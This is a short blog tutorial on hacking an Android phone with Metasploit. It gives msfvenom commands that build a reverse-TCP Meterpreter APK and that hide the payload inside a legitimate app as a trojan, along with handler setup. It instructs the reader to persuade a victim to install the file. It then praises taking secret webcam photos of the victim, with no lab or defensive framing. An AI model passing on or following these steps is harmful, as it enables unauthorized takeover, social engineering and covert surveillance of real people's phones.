Tuesday, January 22, 2019

How to hack Android device with Metasploit

1. Turn on your Kali

2. Open a terminal and type in msfvenom -p android/meterpreter/reverse_tcp LHOST= R > /root/update.apk

generate the update apk file

NOTE: Make sure to replace next to LHOST with your IP address. If you want to hack the Android device over the internet you will have to port forward and put in your external IP address instead of local IP.

You can also bind this payload to an APK file as well. To do that all you need to do is type in 

msfvenom -x mxplayer.apk -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > -o mxplayer.apk

where mxplayer.apk is your original mxplayer.apk file. This works very well in a real scenario but for this tutorial, I am going to show you the normal way.

3. Open another terminal and type in msfconsole and press Enter

running the metasploit console

4. Wait for the console to load completely then type in use exploit/multi/handler and press Enter

using the multi handler

5. Now we need to set up a reverse payload. You can do that by typing in set payload android/meterpreter/reverse_tcp

set up the reverse tcp payload

6. Now set the LHOST to your local IP address (even if you are hacking over the internet still use your local IP address here.)

setup the lhost

7. Now set the LPORT to any port you wish to listen on. I went with a random port 4444 but you can put in any port you want.

set up the listening port number

8. Now type in exploit and press Enter to start listening.

exploiting the targeted system

9. Go into the root folder and you will be able to find the update.apk file. Send this APK file to your victim and convince them to install it. Once it is installed you should be able to fully control the victim's Android device.

location of the apk file

Note: the victim's device must have the option Unknown Sources enabled on their phone in order for them to install the APK file. 

10. Now you can execute some command inside the Metasploit console to control the victim's Android device. Type in help and press Enter to see all of the commands you can run. 

you can also view the version of the Android OS that is installed on the victim's phone by executing the sysinfo command

My favorite one is the webcam_snap 1. This will use the webcam to take a picture of the victim. 


Post a Comment